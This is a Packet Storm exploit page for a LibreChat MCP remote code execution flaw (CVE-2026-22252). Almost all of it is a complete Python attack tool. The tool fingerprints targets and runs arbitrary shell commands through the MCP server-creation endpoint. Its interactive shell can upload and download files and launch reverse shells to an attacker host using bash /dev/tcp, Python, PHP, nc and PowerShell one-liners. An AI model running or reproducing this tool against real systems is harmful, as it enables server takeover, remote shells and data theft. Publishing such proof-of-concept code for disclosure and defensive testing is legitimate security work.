PACKETSTORM 9.9 CRITICAL

📄 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214609

9.9 / 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Description

This proof of concept exploit targets the LibreChat MCP remote code execution vulnerability known as CVE-2026-22252. It provides a comprehensive and professional framework for detecting, testing, and exploiting the vulnerability with multiple...
Visit Original Source

Basic Information

ID PACKETSTORM:214609
Published Jan 30, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : LibreChat MCP 0.8.2-rc2 RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.librechat.ai/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213714/ & CVE-2026-22252

[+] Summary : exploit targets the LibreChat MCP Remote Code Execution vulnerability (CVE-2026-22252).
It provides a comprehensive and professional framework for detecting, testing, and exploiting the vulnerability with multiple extraction modes.
[+] Key Features:

Target Discovery: Detects LibreChat installations, extracts version, OS type, shell, CSRF status, and public writable paths.

MCP Interaction: Checks MCP endpoint availability, determines required permissions, and supports command execution with optional token-based authentication.

Command Execution: Executes system commands safely using multiple extraction modes: direct, file, network, or base64 encoded.

Vulnerability Testing: Performs safe and thorough tests with verification of results.

Interactive Shell: Provides a CLI interface with command history, status display, file upload/download, reverse shell creation, and rate limiting.

Cross-Platform Support: Works on Linux, macOS, and Windows with adaptive shell commands.

Logging & Debugging: Detailed logs saved locally and on-screen, with verbose mode for troubleshooting.

[+] POC :

#!/usr/bin/env python3

import requests
import json
import sys
import re
import time
import argparse
import signal
import os
import random
import string
from typing import Optional, Dict, Any, Tuple, List
from dataclasses import dataclass
from enum import Enum
import logging
from urllib.parse import urljoin, urlparse
from pathlib import Path
import hashlib

logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.StreamHandler(),
logging.FileHandler('librechat_exploit.log')
]
)
logger = logging.getLogger(__name__)

class TransportType(Enum):
"""Supported transport types"""
STDIO = "stdio"
SSE = "sse"
HTTP = "http"

class ExploitMode(Enum):
"""Output extraction methods"""
DIRECT = "direct"
FILE = "file"
NETWORK = "network"
ENCODED = "encoded"

@dataclass
class AuthResult:
"""Authentication result"""
success: bool
token: Optional[str] = None
cookies: Optional[Dict] = None
session_id: Optional[str] = None
csrf_token: Optional[str] = None
user_role: str = "user"
permissions: List[str] = None
message: str = ""

@dataclass
class TargetInfo:
"""Target system information"""
is_librechat: bool = False
version: Optional[str] = None
csrf_enabled: bool = False
mcp_available: bool = False
mcp_requires_admin: bool = False
public_paths: List[str] = None
os_type: str = "linux"
shell_type: str = "sh"

class LibreChatExploit:
def __init__(self, target_url: str, timeout: int = 30):
self.target_url = target_url.rstrip('/')
self.timeout = timeout
self.target_info = TargetInfo()
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
})

self.auth_result = AuthResult(success=False, permissions=[])
self.csrf_token = None

def _extract_csrf_token(self, response_text: str) -> Optional[str]:
"""Extract CSRF token from HTML or JSON"""
patterns = [
r'name="csrfToken" value="([^"]+)"',
r'"csrfToken":"([^"]+)"',
r'window\.csrfToken = "([^"]+)"',
r'<meta name="csrf-token" content="([^"]+)"',
]

for pattern in patterns:
match = re.search(pattern, response_text)
if match:
return match.group(1)
if 'csrf_token' in self.session.cookies:
return self.session.cookies.get('csrf_token')

return None

def _generate_random_string(self, length: int = 8) -> str:
"""Generate random string"""
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

def _detect_public_paths(self) -> List[str]:
"""Detect available public paths"""
common_public_paths = [
'/images/',
'/public/',
'/static/',
'/assets/',
'/uploads/',
'/media/',
'/files/',
'/downloads/',
]

available_paths = []

for path in common_public_paths:
try:
response = self.session.get(
urljoin(self.target_url, path),
timeout=5,
allow_redirects=False
)
if response.status_code in [200, 301, 302, 403]:
available_paths.append(path)
logger.debug(f"Found public path: {path}")

except Exception as e:
logger.debug(f"Path check {path} failed: {e}")
continue

return available_paths

def _detect_os_and_shell(self) -> Tuple[str, str]:
"""Detect operating system and shell type"""
os_type = "linux"
shell_type = "sh"

return os_type, shell_type

def check_target(self) -> Tuple[bool, str]:
"""Comprehensive target check"""
try:
response = self.session.get(
self.target_url,
timeout=self.timeout
)

if response.status_code != 200:
return False, f"Server unavailable (HTTP {response.status_code})"
html_content = response.text
librechat_indicators = [
'LibreChat',
'librechat',
'Evo',
'next/head',
'authToken',
'conversationId',
]

is_librechat = any(indicator.lower() in html_content.lower()
for indicator in librechat_indicators)

if not is_librechat:
return False, "This may not be a LibreChat server"

self.target_info.is_librechat = True
version_patterns = [
r'"version":"([^"]+)"',
r'librechat-([\d\.]+)',
r'v(\d+\.\d+\.\d+)',
r'Version\s+([\d\.]+)',
]

for pattern in version_patterns:
match = re.search(pattern, html_content, re.IGNORECASE)
if match:
self.target_info.version = match.group(1)
break
self.csrf_token = self._extract_csrf_token(html_content)
if self.csrf_token:
self.session.headers.update({'X-CSRF-Token': self.csrf_token})
self.target_info.csrf_enabled = True
self.target_info.public_paths = self._detect_public_paths()
self.target_info.os_type, self.target_info.shell_type = self._detect_os_and_shell()

return True, f"LibreChat {self.target_info.version if self.target_info.version else 'unknown'}"

except requests.RequestException as e:
return False, f"Connection error: {e}"
except Exception as e:
logger.error(f"Unexpected error in target check: {e}")
return False, f"Check error: {e}"

def _get_user_permissions(self) -> List[str]:
"""Get user permissions"""
permissions = []
check_endpoints = [
('/api/admin', 'admin_access'),
('/api/mcp/servers', 'mcp_access'),
('/api/users', 'user_management'),
('/api/settings', 'settings_access'),
]

for endpoint, perm_name in check_endpoints:
try:
url = urljoin(self.target_url, endpoint)
response = self.session.get(url, timeout=10)

if response.status_code == 200:
permissions.append(perm_name)
elif response.status_code == 403:
permissions.append(f"{perm_name}_denied")
elif response.status_code == 404:
pass

except Exception as e:
logger.debug(f"Permission check {perm_name} failed: {e}")

return permissions

def check_mcp_endpoint(self) -> Tuple[bool, str]:
"""Check MCP endpoint and permissions"""
mcp_url = urljoin(self.target_url, '/api/mcp/servers')

try:
response = self.session.get(mcp_url, timeout=self.timeout)

if response.status_code == 401:
logger.debug("MCP requires authentication")
elif response.status_code == 403:
self.target_info.mcp_requires_admin = True
return False, "Requires admin privileges"
elif response.status_code == 404:
alt_paths = ['/api/v1/mcp/servers', '/api/v2/mcp/servers', '/mcp/api/servers']
for path in alt_paths:
alt_url = urljoin(self.target_url, path)
try:
alt_response = self.session.get(alt_url, timeout=5)
if alt_response.status_code < 400:
mcp_url = alt_url
break
except:
continue
if self.auth_result.success:
headers = {}
if self.auth_result.token:
headers['Authorization'] = f"Bearer {self.auth_result.token}"

response = self.session.get(mcp_url, headers=headers, timeout=self.timeout)

if response.status_code == 200:
self.target_info.mcp_available = True
try:
test_payload = {
"config": {
"type": "stdio",
"title": "permission_test",
"command": "echo",
"args": ["test"]
}
}

test_response = self.session.post(
mcp_url,
json=test_payload,
headers=headers,
timeout=self.timeout
)

if test_response.status_code in [200, 201]:
return True, "Available for read/write"
elif test_response.status_code == 403:
self.target_info.mcp_requires_admin = True
return False, "Requires admin privileges for write"
else:
return True, f"Read only (POST: {test_response.status_code})"

except Exception as e:
logger.debug(f"MCP permission test failed: {e}")
return True, "Available (write test failed)"

elif response.status_code == 403:
self.target_info.mcp_requires_admin = True
return False, "Forbidden - requires higher privileges"

elif response.status_code == 404:
return False, "Endpoint not found"

return False, f"Unknown status: {response.status_code}"

except Exception as e:
logger.error(f"MCP check error: {e}")
return False, f"Connection error: {e}"

def execute_command(self, command: str, exfil_mode: ExploitMode = ExploitMode.DIRECT) -> Tuple[bool, str, Optional[str]]:
"""Execute command with multiple output extraction options"""
if not self.auth_result.success:
return False, "Unauthorized", None
final_command = self._prepare_command(command, exfil_mode)
mcp_url = urljoin(self.target_url, '/api/mcp/servers')

headers = {
"Content-Type": "application/json",
}

if self.auth_result.token:
headers['Authorization'] = f"Bearer {self.auth_result.token}"

if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token

payload = {
"config": {
"type": "stdio",
"title": f"cmd_{self._generate_random_string()}",
"command": self._get_shell_path(),
"args": ["-c", final_command]
}
}

try:
logger.info(f"Sending command via MCP...")
response = self.session.post(
mcp_url,
json=payload,
headers=headers,
timeout=self.timeout
)

if response.status_code in [200, 201]:
output = self._retrieve_output(command, exfil_mode)
return True, "Command executed successfully", output
else:
error_msg = f"Execution failed: {response.status_code}"
if response.text:
error_msg += f" - {response.text[:200]}"
return False, error_msg, None

except requests.Timeout:
return False, "Timeout - command may still be executing", None
except Exception as e:
logger.error(f"Execution error: {e}")
return False, f"Error: {e}", None

def _prepare_command(self, command: str, exfil_mode: ExploitMode) -> str:
"""Prepare command based on extraction method"""
random_suffix = self._generate_random_string()

if exfil_mode == ExploitMode.DIRECT:
return f"({command}) 2>&1"

elif exfil_mode == ExploitMode.FILE:
temp_file = f"/tmp/cmd_out_{random_suffix}.txt"
return f"({command}) 2>&1 > {temp_file} && echo 'OUTPUT_SAVED:{temp_file}'"

elif exfil_mode == ExploitMode.NETWORK:
return f"({command}) 2>&1 | base64"

elif exfil_mode == ExploitMode.ENCODED:
return f"echo 'START_OUTPUT' && ({command}) 2>&1 | base64 -w0 && echo 'END_OUTPUT'"

return f"({command}) 2>&1"

def _get_shell_path(self) -> str:
"""Get appropriate shell path"""
if self.target_info.os_type == "windows":
return "cmd.exe"
elif self.target_info.shell_type == "bash":
return "/bin/bash"
else:
return "/bin/sh"

def _retrieve_output(self, original_command: str, exfil_mode: ExploitMode) -> Optional[str]:
"""Retrieve command output"""
output = None

try:
if exfil_mode == ExploitMode.DIRECT:
pass

elif exfil_mode == ExploitMode.FILE:
find_cmd = f"find /tmp -name '*cmd_out_*.txt' -mmin -1 2>/dev/null | head -5"
success, files_output = self._execute_simple_command(find_cmd)

if success and files_output:
for line in files_output.split('\n'):
if line.strip():
read_cmd = f"cat {line.strip()} 2>/dev/null && rm -f {line.strip()}"
success, content = self._execute_simple_command(read_cmd)
if success:
output = content
break

elif exfil_mode == ExploitMode.ENCODED:
log_cmds = [
"dmesg | tail -20 2>/dev/null",
"journalctl --no-pager -n 20 2>/dev/null",
"cat /var/log/syslog 2>/dev/null | tail -20",
]

for log_cmd in log_cmds:
success, log_output = self._execute_simple_command(log_cmd)
if success and "START_OUTPUT" in log_output:
start = log_output.find("START_OUTPUT") + len("START_OUTPUT")
end = log_output.find("END_OUTPUT")
if end > start:
encoded = log_output[start:end].strip()
try:
import base64
output = base64.b64decode(encoded).decode('utf-8', errors='ignore')
except:
output = encoded
break

except Exception as e:
logger.debug(f"Output retrieval failed: {e}")

return output

def _execute_simple_command(self, command: str) -> Tuple[bool, str]:
"""Execute simple command (for extraction)"""
try:
success, msg, output = self.execute_command(
command,
exfil_mode=ExploitMode.ENCODED
)
return success, output if output else ""
except:
return False, ""

def test_vulnerability(self) -> Tuple[bool, str, Optional[str]]:
"""Test vulnerability accurately and safely"""
test_id = self._generate_random_string(12)
test_file = f"/tmp/librechat_test_{test_id}.txt"
test_command = f"""
echo "=== TEST START {test_id} ===" &&
id &&
echo "---" &&
whoami &&
echo "---" &&
pwd &&
echo "---" &&
uname -a &&
echo "=== TEST END {test_id} ==="
"""

logger.info(f"Testing vulnerability (ID: {test_id})...")
for exfil_mode in [ExploitMode.ENCODED, ExploitMode.FILE, ExploitMode.DIRECT]:
logger.debug(f"Trying method: {exfil_mode.value}")

success, message, output = self.execute_command(test_command, exfil_mode)

if success:
logger.info(f"[ok] Execution successful with {exfil_mode.value}")

if output:

if test_id in output:
logger.info(f"[ok] Results verified")
return True, f"Vulnerability exists and exploitable (method: {exfil_mode.value})", output
else:
logger.debug("Results don't contain expected identifier")

return True, f"Vulnerability exists (execution successful)", output
time.sleep(1)
file_test_command = f"echo 'VULN_TEST_{test_id}' > {test_file}"
check_command = f"cat {test_file} 2>/dev/null && rm -f {test_file}"

success1, msg1, _ = self.execute_command(file_test_command, ExploitMode.DIRECT)
time.sleep(1)
success2, msg2, output = self.execute_command(check_command, ExploitMode.ENCODED)

if success1 and success2 and output and f"VULN_TEST_{test_id}" in output:
return True, "Vulnerability exists (file test successful)", output

return False, "Vulnerability not found or not exploitable", None

class InteractiveExploitShell:
"""Enhanced interactive interface"""
def __init__(self, exploit: LibreChatExploit):
self.exploit = exploit
self.running = True
self.command_history = []
self.session_id = hashlib.md5(str(time.time()).encode()).hexdigest()[:8]
signal.signal(signal.SIGINT, self._signal_handler)
signal.signal(signal.SIGTERM, self._signal_handler)
self.rate_limit = 1.0
self.last_command_time = 0
self.output_mode = ExploitMode.ENCODED

def _signal_handler(self, signum, frame):
"""Handle system signals"""
logger.info(f"\n[!] Received signal {signum} - safe termination...")
self.running = False

def _check_rate_limit(self):
"""Check rate limiting"""
current_time = time.time()
time_since_last = current_time - self.last_command_time

if time_since_last < self.rate_limit:
sleep_time = self.rate_limit - time_since_last
logger.debug(f"Rate limiting: wait {sleep_time:.2f} seconds")
time.sleep(sleep_time)

def _cleanup_temp_files(self):
"""Clean up temporary files if possible"""
cleanup_cmd = "find /tmp -name '*librechat_*' -mmin +5 -delete 2>/dev/null"
self.exploit.execute_command(cleanup_cmd, ExploitMode.DIRECT)

def run(self):
"""Run interactive interface"""
print(f"\n{'='*60}")
print(f"LibreChat MCP RCE - Session: {self.session_id}")
print(f"Target: {self.exploit.target_url}")
print(f"User: {self.exploit.auth_result.user_role}")
print(f"{'='*60}")
print("Type 'help' for full menu")

while self.running:
try:
self._check_rate_limit()

prompt = f"\nexploit[{self.session_id}]> "
try:
cmd = input(prompt).strip()
except (EOFError, KeyboardInterrupt):
print("\n[*] Ending session...")
break

if not cmd:
continue

self.last_command_time = time.time()
self.command_history.append(cmd)

if len(self.command_history) > 50:
self.command_history.pop(0)

if self._handle_special_commands(cmd):
continue

self._execute_user_command(cmd)

except Exception as e:
logger.error(f"Interactive interface error: {e}")
time.sleep(0.5)

self._cleanup_temp_files()
print(f"\n[*] Ending session {self.session_id}")

def _handle_special_commands(self, cmd: str) -> bool:
"""Handle special commands"""
cmd_lower = cmd.lower().strip()

if cmd_lower == 'exit' or cmd_lower == 'quit':
self.running = False
return True

elif cmd_lower == 'help':
self._show_help()
return True

elif cmd_lower == 'history':
self._show_history()
return True

elif cmd_lower == 'status':
self._show_status()
return True

elif cmd_lower == 'mode':
self._change_output_mode()
return True

elif cmd_lower == 'clear':
os.system('clear' if os.name != 'nt' else 'cls')
return True

elif cmd_lower.startswith('shell '):
self._handle_reverse_shell(cmd)
return True

elif cmd_lower.startswith('upload '):
self._handle_file_upload(cmd)
return True

elif cmd_lower.startswith('download '):
self._handle_file_download(cmd)
return True

return False

def _show_help(self):
"""Show help menu"""
help_text = """
╔══════════════════════════════════════════════════════════╗
║ LibreChat RCE Commands by indoushka ║
╚══════════════════════════════════════════════════════════╝

Basic Commands:
help Show this menu
exit / quit Exit session
status Show system status
history Show command history
clear Clear screen
mode Change output display method

Advanced Commands:
shell [LHOST] [LPORT] Create reverse shell
upload [local] [remote] Upload file
download [remote] [local] Download file

System Exploration:
pwd Current directory
ls [path] List files
cat [file] Show file content

Information Gathering:
id User information
whoami Username
uname -a System info
ps aux Running processes

Note: Use ';' to separate multiple commands
"""
print(help_text)

def _show_history(self):
"""Show command history"""
if not self.command_history:
print("[*] No commands in history")
return

print("\nCommand History (newest first):")
print("-" * 50)
for i, cmd in enumerate(reversed(self.command_history[-10:]), 1):
print(f"{i:2d}. {cmd[:60]}{'...' if len(cmd) > 60 else ''}")
print("-" * 50)

def _show_status(self):
"""Show system status"""
print(f"\n{'='*50}")
print("System Status:")
print(f"{'='*50}")
print(f"Target: {self.exploit.target_url}")
print(f"Version: {self.exploit.target_info.version or 'unknown'}")
print(f"User: {self.exploit.auth_result.user_role}")
print(f"OS: {self.exploit.target_info.os_type}")
print(f"Shell: {self.exploit.target_info.shell_type}")
print(f"CSRF: {'enabled' if self.exploit.target_info.csrf_enabled else 'disabled'}")
print(f"MCP: {'available' if self.exploit.target_info.mcp_available else 'unavailable'}")
print(f"Requires admin: {'yes' if self.exploit.target_info.mcp_requires_admin else 'no'}")
print(f"Output method: {self.output_mode.value}")
print(f"{'='*50}")

def _change_output_mode(self):
"""Change output display method"""
modes = list(ExploitMode)
print("\nAvailable output methods:")
for i, mode in enumerate(modes, 1):
print(f" {i}. {mode.value}")

try:
choice = input("\nChoose number [1-4]: ").strip()
if choice.isdigit() and 1 <= int(choice) <= len(modes):
self.output_mode = modes[int(choice) - 1]
print(f"[ok] Changed to: {self.output_mode.value}")
else:
print("[!] Invalid choice")
except:
print("[!] Choice error")

def _handle_reverse_shell(self, cmd: str):
"""Handle reverse shell command"""
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: shell [LHOST] [LPORT]")
return

lhost = parts[1]
lport = parts[2]

if not lport.isdigit():
print("[!] Port must be a number")
return

print(f"\n[*] Preparing reverse shell to {lhost}:{lport}")
print("[*] Make sure listener is running:")
print(f" nc -lvnp {lport}")
print("\n[*] Attempting...")

shells = []

if self.exploit.target_info.os_type == "linux":
shells = [
f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
f"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
f"php -r '$s=fsockopen(\"{lhost}\",{lport});exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
f"nc -e /bin/sh {lhost} {lport}",
]
elif self.exploit.target_info.os_type == "windows":
shells = [
f"powershell -c \"$c=New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length)) -ne 0){{;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb+'PS '+(pwd).Path+'> ';$sbt=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()}};$c.Close()\"",
]

for i, shell_cmd in enumerate(shells, 1):
print(f"\n[*] Trying shell #{i}...")
success, message, _ = self.exploit.execute_command(shell_cmd, self.output_mode)

if success:
print(f"[ok] Shell sent successfully")
print("[*] Wait 5 seconds for connection...")
time.sleep(5)
break
else:
print(f"[no] Failed: {message}")

def _handle_file_upload(self, cmd: str):
"""Upload file to server"""
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: upload [local file] [remote path]")
return

local_file = parts[1]
remote_path = parts[2]

if not os.path.exists(local_file):
print(f"[!] Local file not found: {local_file}")
return

try:
with open(local_file, 'rb') as f:
content = f.read()

import base64
encoded_content = base64.b64encode(content).decode('utf-8')

upload_cmd = f"""
echo '{encoded_content}' | base64 -d > "{remote_path}" &&
echo "UPLOAD_SUCCESS: {remote_path}" ||
echo "UPLOAD_FAILED"
"""

print(f"[*] Uploading {local_file} to {remote_path}...")
success, message, output = self.exploit.execute_command(upload_cmd, self.output_mode)

if success and output and "UPLOAD_SUCCESS" in output:
print(f"[ok] File uploaded successfully")
else:
print(f"[no] Upload failed: {message}")

except Exception as e:
print(f"[no] Upload error: {e}")

def _handle_file_download(self, cmd: str):
"""Download file from server"""
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: download [remote path] [local file]")
return

remote_path = parts[1]
local_file = parts[2]

download_cmd = f"""
if [ -f "{remote_path}" ]; then
cat "{remote_path}" | base64 -w0;
echo "";
else
echo "FILE_NOT_FOUND";
fi
"""

print(f"[*] Downloading {remote_path} to {local_file}...")
success, message, output = self.exploit.execute_command(download_cmd, ExploitMode.ENCODED)

if success and output and output.strip() and "FILE_NOT_FOUND" not in output:
try:
import base64
content = base64.b64decode(output.strip())

with open(local_file, 'wb') as f:
f.write(content)

print(f"[ok] Downloaded successfully ({len(content)} bytes)")

except Exception as e:
print(f"[no] Decryption error: {e}")
else:
print(f"[no] Download failed: {message}")

def _execute_user_command(self, cmd: str):
"""Execute user command"""
print(f"[*] Executing...")

start_time = time.time()
success, message, output = self.exploit.execute_command(cmd, self.output_mode)
elapsed = time.time() - start_time

if success:
print(f"[ok] Executed ({elapsed:.2f} seconds)")
if output and output.strip():
print(f"\n{'='*50}")
print("Output:")
print(f"{'='*50}")
print(output[:5000])
if len(output) > 5000:
print(f"\n[...] Output truncated ({len(output)} chars)")
print(f"{'='*50}")
else:
print(f"[no] Failed: {message}")

def main():
parser = argparse.ArgumentParser(
description='LibreChat MCP RCE Exploit - Final Version',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -u http://localhost:3080 --check
%(prog)s -u http://target.com --test
%(prog)s -u http://target.com -c "id"
%(prog)s -u http://target.com --interactive

Warning: For legal and ethical use only.
Written authorization required before testing any system.
"""
)

parser.add_argument('-u', '--url', required=True,
help='Target URL (e.g., http://localhost:3080)')
parser.add_argument('-c', '--command',
help='Command to execute')
parser.add_argument('-f', '--command-file',
help='File containing commands to execute')
parser.add_argument('--test', action='store_true',
help='Test vulnerability only')
parser.add_argument('--check', action='store_true',
help='Check system only')
parser.add_argument('--interactive', action='store_true',
help='Interactive mode')
parser.add_argument('--username', default='test_user',
help='Username (default: test_user)')
parser.add_argument('--password', default='Test12345!',
help='Password (default: Test12345!)')
parser.add_argument('--email', default='[email protected]',
help='Email (default: [email protected])')
parser.add_argument('--timeout', type=int, default=30,
help='Timeout in seconds (default: 30)')
parser.add_argument('--verbose', '-v', action='store_true',
help='Show detailed information')
parser.add_argument('--output-mode', choices=['direct', 'file', 'encoded'],
default='encoded', help='Output extraction method')

args = parser.parse_args()

if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)

print("="*60)
print("LibreChat MCP RCE Exploit by indoushka")
print("CVE-2026-22252")
print("="*60)

try:
exploit = LibreChatExploit(args.url, args.timeout)

print("[*] Checking target system...")
target_ok, target_msg = exploit.check_target()

if not target_ok:
print(f"[no] {target_msg}")
sys.exit(1)

print(f"[ok] {target_msg}")
print(f"\n[*] System Information:")
print(f" - Version: {exploit.target_info.version or 'unknown'}")
print(f" - OS: {exploit.target_info.os_type}")
print(f" - Shell: {exploit.target_info.shell_type}")
print(f" - CSRF: {'enabled' if exploit.target_info.csrf_enabled else 'disabled'}")
if exploit.target_info.public_paths:
print(f" - Public paths: {', '.join(exploit.target_info.public_paths)}")

print("\n[*] Checking MCP endpoint...")
mcp_ok, mcp_msg = exploit.check_mcp_endpoint()
print(f"[*] MCP: {mcp_msg}")

if not mcp_ok and "requires authentication" not in mcp_msg:
print(f"[!] Warning: {mcp_msg}")
if not args.interactive:
sys.exit(1)

if args.check:
sys.exit(0)

if args.test:
print("\n[*] Testing vulnerability...")
vulnerable, vuln_msg, output = exploit.test_vulnerability()

if vulnerable:
print(f"[ok] {vuln_msg}")
if output:
print(f"\n[+] Sample output:\n{output[:500]}")
else:
print(f"[no] {vuln_msg}")

sys.exit(0)

if args.command:
output_mode = ExploitMode(args.output_mode)
print(f"\n[*] Executing command: {args.command}")
success, message, output = exploit.execute_command(args.command, output_mode)

if success:
print(f"[ok] {message}")
if output:
print(f"\n[+] Output:\n{output}")
else:
print(f"[no] {message}")

elif args.interactive:
shell = InteractiveExploitShell(exploit)
shell.run()

else:
print("\n[!] No action specified. Use --help for help")

except KeyboardInterrupt:
print("\n\n[*] Interrupted by user")
sys.exit(0)
except Exception as e:
logger.error(f"Unexpected error: {e}")
sys.exit(1)

if __name__ == "__main__":
main()

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.